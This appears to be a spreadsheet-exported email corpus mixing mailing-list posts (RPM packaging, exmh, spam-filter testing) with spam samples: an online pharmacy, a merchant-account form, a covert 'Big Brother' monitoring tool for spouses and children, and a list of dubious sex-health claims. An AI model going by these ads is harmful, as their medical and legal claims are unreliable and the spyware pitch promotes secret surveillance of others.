 &gt; --&lt;/snip&gt;--
 &gt;=20
 &gt; The openssl095a package should provide the openssl-0.9.5a compatibility=
 =20
 &gt; but apt doesn't think so?=20
 I believe that's just a matter of string parsing. If someone were to fix
 the openssh package, removing the explicit Requires:, I believe the
 automagic binary handler would figure the right libraries to use and
 install. I haven't met an openssh like that and in worst case I've had 3
 different openssl libraries (WTF can't they just bump a major version if
 it's incompatible?!?).
 &gt; 2. I have postgresql installed from the source. So that's why I need=20
 &gt; php-pgsql. Is there a way to tell apt about packages I don't want it to=
 =20
 &gt; complain about?
 I have a few such things (with jdk, imlib, kernel DRI version..
 something) and Ive just made dummy packages (with verbose warning
 attached ;) that explicitly provide those capabilities. (or claim to,
 that is).
 --=20
 If you only want to go 500 miles, can you begin with a halfstep?
 --bg08WKrSYDhXBjb5
 Content-Type: application/pgp-signature
 Content-Disposition: inline
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: For info see http://www.gnupg.org
 iD8DBQE8YT35QF8Oi9XNck4RAuNpAJ90B0EUZ7Lkqpr+KYzWPRi+i4DcWACdHQd5
 Tb0GZvVivaW1rOzqP/Su9Gc=
 =h7Ff
 -----END PGP SIGNATURE-----
 --bg08WKrSYDhXBjb5--
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: At last, I have an excuse
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.oblomovka.com/entries/2002/10/07#1034055900
 Date: 2002-10-07T22:45:00-0700
 ... for not updating: I'm doing the guestblog at Boing Boing[1]. Now to find an 
 excuse for missing last week.
 [1] http://www.boingboing.net/
</t>
  </si>
  <si>
    <t xml:space="preserve">On Friday 06 September 2002 20:48, Skip Montanaro wrote:
 &gt;     Greg&gt; In case it wasn't obvious, I'm a strong proponent of
 &gt; filtering Greg&gt; junk mail as early as possible, ie. right after the
 &gt; SMTP DATA Greg&gt; command has been completed.  Filtering spam at the
 &gt; MUA just seems Greg&gt; stupid to me -- by the time it gets to me MUA,
 &gt; the spammer has Greg&gt; already stolen my bandwidth.
 &gt;
 &gt; The two problems I see with filtering that early are:
 &gt;
 &gt;     1. Everyone receiving email via that server will contribute ham
 &gt; to the stew, making the Bayesian classification less effective.
 &gt;
 &gt;     2. Given that there will be some false positives, you absolutely
 &gt; have to put the mail somewhere.  You can't simply delete it.  (I also
 &gt; don't like the TMDA-ish business of replying with a msg that says,
 &gt; "here's what you do to really get your message to me."  That puts an
 &gt; extra burden on my correspondents.)  As an individual, I would prefer
 &gt; you put spammish messages somewhere where I can review them, not an
 &gt; anonymous sysadmin who I might not trust with my personal email
 &gt; (nothing against you Greg ;-).
 &gt;
 &gt; I personally prefer to manage this stuff at the user agent level. 
 &gt; Bandwidth is a heck of a lot cheaper than my time.
 &gt;
 I see no reason why both approaches could and should not be used.
 MTA level filtering would just need to use a different corpus, one that 
 would contain illegal or otherwise commonly unapproved material for the 
 group of people using that MTA.   I'm sure that such an approach would 
 significantly reduce the mail traffic as a first step, without  giving  
 false positives.
 MUA corpus would then be personally trained -- although I'd like the 
 option of 'down-loadable' corpuses and merge functionality.
 Harri
 PS.  Just joined the list, so pardon if my thoughts have been hashed 
 through before.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Facts about sex.
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Forwarded-by: Flower
 Did you know that you can tell from the skin whether a person is
 sexually active or not?
 1. Sex is a beauty treatment. Scientific tests find that when woman
    make love they produce more of the hormone estrogen, which makes
    hair shiny and skin smooth.
 2. Gentle, relaxed lovemaking reduces your chances of suffering
    dermatitis, skin rashes and blemishes. The sweat produced cleanses
    the pores and makes your skin glow.
 3. Lovemaking can burn up those calories you piled on during that
    romantic dinner.
 4. Sex is one of the safest sports you can take up. It stretches
    and tones up just about every muscle in the body. It's more enjoyable
    than swimming 20 laps, and you don't need special sneakers!
 5. Sex is an instant cure for mild depression. It releases the body
    endorphin into the bloodstream, producing a sense of euphoria and
    leaving you with a feeling of well-being.
 6. The more sex you have, the more you will be offered. The sexually
    active body gives off greater quantities of chemicals called
    pheromones.  These subtle sex perfumes drive the opposite sex crazy!
 7. Sex is the safest tranquilizer in the world. IT IS 10 TIMES MORE
    EFFECTIVE THAN VALIUM.
 8. Kissing each day will keep the dentist away. Kissing encourages
    saliva to wash food from the teeth and lowers the level of the acid
    that causes decay, preventing plaque build-up.
 9. Sex actually relieves headaches. A lovemaking session can release
    the tension that restricts blood vessels in the brain.
 10. A lot of lovemaking can unblock a stuffy nose. Sex is a national
     antihistamine. It can help combat asthma and hay fever.
 ENJOY SEX!
</t>
  </si>
  <si>
    <t xml:space="preserve">These results are from timtest.py.  I've got three sets of spam and ham
 with about 500 messages in each set.  Here's what happens when I enable
 my latest "received" header code:
     false positive percentages
         0.187  0.187  tied
         0.749  0.562  won    -24.97%
         0.780  0.585  won    -25.00%
     won   2 times
     tied  1 times
     lost  0 times
     total unique fp went from 19 to 17
     false negative percentages
         2.072  1.318  won    -36.39%
         2.448  1.318  won    -46.16%
         0.574  0.765  lost   +33.28%
     won   2 times
     tied  0 times
     lost  1 times
     total unique fn went from 43 to 28
 Anthony's header counting code does not seem to help.
   Neil
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Prescriptions Without Doctors Appointment!!
</t>
  </si>
  <si>
    <t xml:space="preserve">
 The Internet's Online Pharmacy
 Viagra - Xenical - Propecia - Claritin - Celbrex - Renova - Zyban
 Now get your prescriptions approved by a panel of licensed medical doctors online without the need for an office visit.
 After approval of the doctor the medication will be shipped right to your door.
 Visit The Internets Online Pharmacy by clicking the link below:
  http://host.1bulk-email-software.com/ch4/pharm/purple/
 To be removed from future mailings send an email to unlist4me@yahoo.com with remove in the subject
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_-451422450P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;
 &gt; Date:  Thu, 22 Aug 2002 12:23:38 -0500
 &gt;
 &gt; Okay....Catchup unseen is something that I don't use often, but i can 
 &gt; certainly reproduce this.  I'll dig into it.  It's probably simple.
 Try it now.
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_-451422450P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9ZSQ1K9b4h5R0IUIRAt6BAJ4lZwVy40vrhgO5SRoToDOjp7jkdwCfUSw7
 vei8luehray6oqTftNPId8g=
 =6Ao0
 -----END PGP SIGNATURE-----
 --==_Exmh_-451422450P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: NO SET-UP OR APPLICATION FEE ncify
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- saved from url=(0022)http://internet.e-mail --&gt;
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META http-equiv=Content-Type content="text/html; charset=iso-8859-1"&gt;
 &lt;META content="Microsoft FrontPage 4.0" name=GENERATOR&gt;
 &lt;STYLE&gt;&lt;/STYLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgColor=#ffffff&gt;
 &lt;DIV&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV align=center&gt;
 &lt;CENTER&gt;
 &lt;TABLE cellPadding=6 width="73%" border=0 cellspacing="1"&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD width="100%" colSpan=2&gt;
       &lt;P align=center&gt;&lt;B&gt;&lt;FONT face="Arial Black" color=#ff0000 size=5&gt;Increase 
       Your Sales Up to 1500%&lt;/FONT&gt;&lt;/B&gt;&lt;FONT face=Arial color=#000000 
       size=5&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P align=center&gt;&lt;FONT face=Arial color=#000080&gt;&lt;SPAN 
       style="BACKGROUND-COLOR: #ffff00"&gt;&lt;B&gt;**** PAY NO SET-UP OR APPLICATION FEE 
       ****&lt;BR&gt;&lt;/B&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;B&gt;&lt;FONT face=Arial color=#000080 
       size=2&gt;&lt;I&gt;&lt;SPAN 
       style="BACKGROUND-COLOR: #ffff00"&gt;(&lt;/SPAN&gt;&lt;/I&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;B&gt;&lt;FONT 
       face=Arial color=#000080 size=2&gt;&lt;I&gt;&lt;SPAN 
       style="BACKGROUND-COLOR: #ffff00"&gt;LIMITED TIME 
       OFFER)&lt;/SPAN&gt;&lt;/I&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
       &lt;P align=center&gt;&lt;B&gt;&lt;FONT face=Arial color=#000080 
       size=2&gt;C&lt;/FONT&gt;&lt;/B&gt;&lt;B&gt;&lt;FONT face=Arial color=#000080 size=2&gt;all 
       (Toll-Free) &lt;/FONT&gt;&lt;FONT face=Arial color=#000080 size=3&gt;1- 888 - 707- 
       4777&lt;/FONT&gt;&lt;FONT face=Arial color=#000080 size=2&gt; with Coupon Code 
       #800&lt;/FONT&gt;&lt;FONT face=Arial color=#000080 size=2&gt; or&lt;BR&gt;use our reply form 
       below for quickest results.&amp;nbsp;&lt;/FONT&gt;&lt;/B&gt;&lt;FONT face=Arial 
       color=#000080&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD vAlign=top width="50%"&gt;&lt;B&gt;&lt;FONT face=Arial color=#000080&gt;We specialize 
       in businesses that would most likely be declined by other 
       processors:&lt;/FONT&gt;&lt;/B&gt; 
       &lt;UL&gt;
         &lt;LI&gt;&lt;FONT face=Arial color=#000080&gt;Retail&lt;/FONT&gt; 
         &lt;LI&gt;&lt;FONT face=Arial color=#000080&gt;Home-Based Businesses&lt;/FONT&gt; 
         &lt;LI&gt;&lt;FONT face=Arial color=#000080&gt;MLM's&lt;/FONT&gt; 
         &lt;LI&gt;&lt;FONT face=Arial color=#000080&gt;Network Marketing&lt;/FONT&gt; 
         &lt;LI&gt;&lt;FONT face=Arial color=#000080&gt;High Volume&lt;/FONT&gt; 
         &lt;LI&gt;&lt;FONT face=Arial color=#000080&gt;Membership Sites&lt;/FONT&gt; 
         &lt;LI&gt;&lt;FONT face=Arial color=#000080&gt;New Businesses&lt;/FONT&gt; 
         &lt;LI&gt;&lt;FONT face=Arial color=#000080&gt;Good or Bad Credit&lt;/FONT&gt; 
         &lt;LI&gt;&lt;FONT face=Arial color=#000080&gt;Adult Web Sites&lt;/FONT&gt; &lt;/LI&gt;&lt;/UL&gt;&lt;/TD&gt;
     &lt;TD vAlign=top width="50%"&gt;&lt;B&gt;&lt;FONT face=Arial color=#000080 
       size=3&gt;Account Features Include:&lt;/FONT&gt;&lt;/B&gt; 
       &lt;UL&gt;
         &lt;LI&gt;&lt;FONT face=Arial color=#000080 size=3&gt;EZ credit - &lt;U&gt;99% Approval 
         Rate&lt;/U&gt;&lt;/FONT&gt; 
         &lt;LI&gt;&lt;FONT face=Arial color=#000080 size=3&gt;Secure real-time transactions 
         on your website.&amp;nbsp;&lt;/FONT&gt; 
         &lt;LI&gt;&lt;FONT face=Arial color=#000080 size=3&gt;&lt;SPAN 
         style="BACKGROUND-COLOR: #ffff00"&gt;Application Fee of $195.00 &amp;amp; 
         Electronic Check Set-Up Fee of $295.00 WAIVED!!&lt;/SPAN&gt;&lt;/FONT&gt; 
         &lt;LI&gt;&lt;FONT face=Arial color=#000080 size=3&gt;Terminal and printer or 
         software available!&amp;nbsp;&lt;/FONT&gt; 
         &lt;LI&gt;&lt;FONT face=Arial color=#000080 size=3&gt;Equipment purchase or 100% tax 
         deductible EZ pay lease option available!&amp;nbsp;&lt;/FONT&gt; 
         &lt;LI&gt;&lt;FONT face=Arial color=#000080 size=3&gt;&lt;U&gt;Discount Rates as low as 
         1.58%&lt;/U&gt;!&amp;nbsp;&lt;/FONT&gt; 
         &lt;LI&gt;&lt;FONT face=Arial color=#000080 size=3&gt;We pay for every person you 
         refer to us for processing!&lt;/FONT&gt; &lt;/LI&gt;&lt;/UL&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD align=middle width="100%" colSpan=2&gt;
       &lt;FORM 
       onsubmit="alert('Thank you for providing us with this information. You will be contacted shortly by one of our representatives.')" 
       action=mailto:jhancock@StudentNow.net?cc=signmeup@realspecialoffers.com&amp;amp;subject=coupon_code_800 
       method=post encType=text/plain&gt;
       &lt;TABLE cellPadding=4 width="80%" bgColor=#ffffff border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD align=right width="50%"&gt;&lt;B&gt;&lt;FONT face=Arial color=#ff0000 
             size=2&gt;Coupon Code&lt;/FONT&gt;&lt;/B&gt;&lt;/TD&gt;
           &lt;TD width="50%"&gt;&lt;FONT face=Arial size=2&gt;&lt;INPUT size=5 value=800 
             name=coupon_code selected&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=right width="50%"&gt;&lt;FONT face=Arial size=2&gt;First and Last 
             Name&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD width="50%"&gt;&lt;FONT face=Arial size=2&gt;&lt;INPUT size=30 
             name=name&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=right width="50%"&gt;&lt;FONT face=Arial size=2&gt;Company 
             Name&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD width="50%"&gt;&lt;FONT face=Arial size=2&gt;&lt;INPUT size=30 
             name=company_name&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=right width="50%"&gt;&lt;FONT face=Arial size=2&gt;Phone Number 
             where you can be reached&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD width="50%"&gt;&lt;FONT face=Arial size=2&gt;&lt;INPUT 
             name=phone_number&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=right width="50%"&gt;&lt;FONT face=Arial size=2&gt;The best time to 
             call you&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD width="50%"&gt;&lt;FONT face=Arial size=2&gt;&lt;INPUT size=10 
             name=best_time_to_call&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=right width="50%"&gt;&lt;FONT face=Arial size=2&gt;Email 
             Address&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD width="50%"&gt;&lt;FONT face=Arial size=2&gt;&lt;INPUT size=30 
             name=email_address&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=right width="50%"&gt;&lt;FONT face=Arial size=2&gt;U.S. State or 
             Canadian Province&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD width="50%"&gt;&lt;FONT face=Arial size=2&gt;&lt;INPUT size=15 
             name=state_name&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=right width="50%"&gt;&lt;FONT face=Arial size=2&gt;Select your 
             Country&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD width="50%"&gt;&lt;FONT face=Arial size=2&gt;&lt;SELECT size=1 name=country&gt; 
               &lt;OPTION&gt;United States&lt;/OPTION&gt; &lt;OPTION selected&gt;choose&lt;/OPTION&gt; 
               &lt;OPTION&gt;Canada&lt;/OPTION&gt;&lt;/SELECT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=right width="50%"&gt;&lt;FONT face=Arial size=2&gt;Type of Business 
             (Optional)&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD width="50%"&gt;&lt;FONT face=Arial size=2&gt;&lt;SELECT size=1 
               name=biz_type&gt; &lt;OPTION value="Standard Retail"&gt;Standard 
               Retail&lt;/OPTION&gt; &lt;OPTION value="store-front establishments"&gt;Store 
               Front Establishments&lt;/OPTION&gt; &lt;OPTION 
               value="Outbound telemarketing"&gt;Outbound telemarketing&lt;/OPTION&gt; 
               &lt;OPTION value=Catalog&gt;Catalog&lt;/OPTION&gt; &lt;OPTION 
               value="MO/TO merchants"&gt;MO/TO merchants&lt;/OPTION&gt; &lt;OPTION 
               value="Dating services"&gt;Dating services&lt;/OPTION&gt; &lt;OPTION 
               value="Airlines "&gt;Airlines&lt;/OPTION&gt; &lt;OPTION 
               value=Subscriptions&gt;Subscriptions&lt;/OPTION&gt; &lt;OPTION 
               value="Discount Coupon Books"&gt;Discount Coupon Books&lt;/OPTION&gt; 
               &lt;OPTION value=Audiotext&gt;Audiotext&lt;/OPTION&gt; &lt;OPTION 
               value="House Party Plans"&gt;House Party Plans&lt;/OPTION&gt; &lt;OPTION 
               value="Extended liability"&gt;Extended liability&lt;/OPTION&gt; &lt;OPTION 
               value="Home-Based Businesses "&gt;Home-Based Businesses&lt;/OPTION&gt; 
               &lt;OPTION value="Foreign Corporations"&gt;Foreign Corporations&lt;/OPTION&gt; 
               &lt;OPTION value="Vitamin / Nutrition"&gt;Vitamin / Nutrition&lt;/OPTION&gt; 
               &lt;OPTION value="Multi-Level Marketers "&gt;Multi-Level 
               Marketers&lt;/OPTION&gt; &lt;OPTION value="Electronic cash "&gt;Electronic 
               cash&lt;/OPTION&gt; &lt;OPTION value="Fulfillment Centers "&gt;Fulfillment 
               Centers&lt;/OPTION&gt; &lt;OPTION 
               value="Personals Advertising (internet)"&gt;Personals Advertising 
               (internet)&lt;/OPTION&gt; &lt;OPTION value="Adult Internet Sites"&gt;Adult 
               Internet Sites&lt;/OPTION&gt; &lt;OPTION value="Online casino"&gt;Online 
               casino&lt;/OPTION&gt; &lt;OPTION value="Other "&gt;Other&lt;/OPTION&gt; &lt;OPTION 
               selected&gt;choose&lt;/OPTION&gt;&lt;/SELECT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=right width="50%"&gt;&lt;FONT face=Arial size=2&gt;Monthly revenue 
             in transactions (Optional)&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD width="50%"&gt;&lt;FONT face=Arial size=2&gt;&lt;INPUT 
             name=monthly_transaction_amount&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
       &lt;P&gt; &lt;INPUT TYPE="submit"&gt;
       &lt;/FORM&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD align=middle width="100%" colSpan=2&gt;&lt;FONT face=Arial&gt;&lt;b&gt;This offer only for U.S. residents, or Canadians with a 
       valid SS# and U.S. bank account.&lt;/b&gt;&lt;/FONT&gt; 
       &lt;p&gt;&amp;nbsp;&lt;/p&gt;
     &lt;/CENTER&gt;
     &lt;p align="center"&gt;&lt;font size="3"&gt;&lt;b&gt;&lt;font face="Verdana" color="#616161"&gt;To
     be removed from this list.&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;font face="Verdana" color="#616161" size="2"&gt;&lt;font face="Verdana" color="#616161" size="4"&gt;&lt;b&gt;&lt;br&gt;
     &lt;/b&gt;&lt;/font&gt;Under Bill S.1618 TITLE III SECTION 301. Per Section 301,
     Paragraph (a) (2) (C) passed by the 105th US Congress any email or Mass
     Marketing email cannot be considered Spam as long as the sender includes
     contact information and a method of removal. To be removed mailto: &lt;a href="mailto:removed@removefactory.com"&gt;removed@removefactory.com&lt;/a&gt;
     and put &amp;quot;Remove&amp;quot; In the Subject line.&lt;/font&gt;&lt;/p&gt;
 &lt;CENTER&gt;
       &lt;P&gt;&lt;FONT face=Arial color=#ffffff&gt;&lt;B&gt;&lt;FONT size=1&gt;To be removed from future mailings, please send a blank email to.&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;/DIV&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 qgncmtflpngnodveuomgyo
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Secretly Record all internet activity on any computer... TAF
</t>
  </si>
  <si>
    <t xml:space="preserve">FIND OUT WHO THEY ARE CHATTING/E-MAILING WITH ALL THOSE HOURS!
 Is your spouse cheating online? 
 Are your kids talking to dangerous people on instant messenger?
 Find out NOW! - with Big Brother instant software download.
 Click on this link NOW to see actual screenshots and to order!
 http://213.139.76.69/ec/bigbro/M30/index.htm
 To be excluded from future contacts please visit:
 http://213.139.76.69/PHP/remove.php
 bacalau
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Fw: NORTON SYSTEMWORKS 2002 FINAL CLEARANCE SALE!           DJHL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</si>
  <si>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href="http://clickthru.online.com/Click?q=b8-smr2QQUw-VgTuqBlq9S_p8qkEi9R"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href="http://clickthru.online.com/Click?q=cd-VHhSQzsK3TBlvnHFjAi_TOlRfXuR" &gt;My Portfolio&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=e2-J1OpQhyzY9JYnGIENBEZdihv9KsR" &gt;Broker Reports&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=f7-N0QnQLgzfYflr_IlrZIGiR6ImOZR" &gt;IPOs&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=0d-3aGuIbr2qbA1qjaNv0T0QkY6b7uR" &gt;Splits&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=22-xNrrIrdA8Q4bkTauo4I9yc99NcsR" &gt;Messages&lt;/a&gt;&lt;/b&gt;
 &lt;/font&gt;
 &lt;!-- /nav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href="http://clickthru.online.com/Click?q=37-EMLQIqzF4Pj1EstQ93KjZ6eJcnZR" &gt;Live tech help NOW!&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=4c-jxi2IZpIbJaBkReAu7hgvo2AKenR" &gt;April's tech award&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=61-x9oAIoLjvQW4buG4JYndFK-AWlrR" &gt;1 million open jobs&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=76-vJf7InBPTWF07h41okYP2r70U6iR" &gt;News.com: Top CIOs&lt;/a&gt; &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=37-EMLQIqzF4PjlPdUQ93KjZ6eJcnZR"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12,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href="http://clickthru.online.com/Click?q=4c-jxi2IZpIbJaBkRPAu7hgvo2AKenR" &gt;DJIA&lt;/a&gt;&lt;br&gt;8684.53 &amp;nbsp;&lt;font color=#cc0000&gt;-117.00&lt;/font&gt;&lt;/td&gt;
 &lt;td width="25%"&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=61-x9oAIoLjvQW4bub4JYndFK-AWlrR" &gt;NASDAQ&lt;/a&gt;&lt;br&gt;1373.49 &amp;nbsp;&lt;font color=#cc0000&gt;-0.94&lt;/font&gt;&lt;/td&gt;
 &lt;td width="25%"&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=76-vJf7InBPTWF07hi1okYP2r70U6iR" &gt;S&amp;P 500&lt;/a&gt;&lt;br&gt;921.39 &amp;nbsp;&lt;font color=#cc0000&gt;-5.98&lt;/font&gt;&lt;/td&gt;
 &lt;td width="25%"&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=8b-SBGBQY0y2oGf6JSEYIEElDh4B1FR" &gt;CNET&amp;nbsp;TECH&lt;/a&gt;&lt;br&gt;990.00 &amp;nbsp;&lt;font color="#cc0000"&gt;&lt;font color=#cc0000&gt;-5.12&lt;/font&gt;&lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=4&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;!-- VISION PROMO --&gt;
 &lt;tr&gt;&lt;td colspan=4 bgcolor="#cccccc"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=4&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=4&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;CNET News.com Vision Series&lt;/b&gt;&lt;br&gt;Read News.com's exclusive interviews of 10 top CIOs.&lt;br&gt;&lt;a href="http://clickthru.online.com/Click?q=a0-11h8QQBqNNjssGPUByjw2PB1s79R" &gt;Vision Series home&lt;/a&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=4&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;!-- /VISION PROMO --&gt;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fall with consumer sentiment&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 A drop in the University of Michigan's consumer sentiment index helped put a dent in technology shares Friday.
 &lt;p&gt;
 Despite Dell Computer raising its outlook and better-than-expected earnings from Juniper Networks, CNET's Tech index slipped 5.12 points, or 0.51 percent, to 990.0. The tech-packed Nasdaq composite index edged down 0.94 points, or 0.06 percent, to 1,373.49.
 &lt;p&gt;
 Broader markets also fell, as investors shrugged off news of better-than-expected retail and food services sales in June. The Dow Jones industrials shed 117 points, or 1.33 percent, to 8,684.5--its fifth straight losing session. The S&amp;P 500 lost 5.98 points, or 0.64 percent, to 921.39.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href="http://clickthru.online.com/Click?q=b6-llkUQCKyZmZAjcoT_PUCch20LgRR" &gt;Rivals help improve Dell's outlook &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Dell Computer on Thursday raised its revenue and earnings outlook for the second quarter, saying it continues to gain market share from computer rivals.
 The company said it now expects revenue for the quarter that ends Aug. 2 will reach $8.3 billion, up about 9 percent from last year's second quarter, with earnings of 19 cents per share. On May 16, the company predicted revenue would hit $8.2 billion and projected earnings at 18 cents per share.&lt;br&gt;&lt;B&gt;DELL COMPUTER CORP 24.98 4.39% &lt;/B&gt;
 &lt;p&gt;
 &lt;font size=3&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=cb-CjRIQJsr-vJl05NyXYHRf_uaHkFR" &gt;Lukewarm response to Juniper moves &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Juniper Networks continues to muddle through the telecom morass.
 Juniper beat estimates by earning less than $500,000, reported a 42 percent decline in year-over-year sales and offered little hope that it could grow its business when it reported 2002 second-quarter earnings Thursday. Yet in some corners of the industry, Juniper's performance was viewed as mildly positive. &lt;br&gt;&lt;B&gt;JUNIPER NETWORKS 7.70 6.65% &lt;/B&gt;
 &lt;p&gt;
 &lt;font size=3&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=e0-cISRQfDHKLxvSMkkPhB7mxUT9A9R" &gt;Asia proves sweet spot for Yahoo&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Web portal Yahoo, which broke a long streak of losses in the second quarter, said it hopes to ride on Asia's acceptance of online advertising and focus on wireless content to boost its regional business.
 "Asian advertisers who use traditional media like newspapers and TV are moving more into online ads as they see the value and efficiency that it delivers," Niren Hiro, Yahoo's general manager for Southeast Asia, said in an interview Thursday. "That's why we've seen in the last quarter clients who have traditionally stayed away from new media like us starting to divert their budgets in our direction."&lt;br&gt;&lt;B&gt;YAHOO INC 12.9400 0.15479876%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href="http://clickthru.online.com/Click?q=f5-lTbRQgwxlE6VmZx6DmLwgkaZmRuR"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href="http://clickthru.online.com/Click?q=0a-ZnKCIrrs-4RcArMBwhq6GOxuYzsR" &gt;J.P. Morgan downgrades Powerwave Technologies to "long-term buy" in tech notes 7/12/02 &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
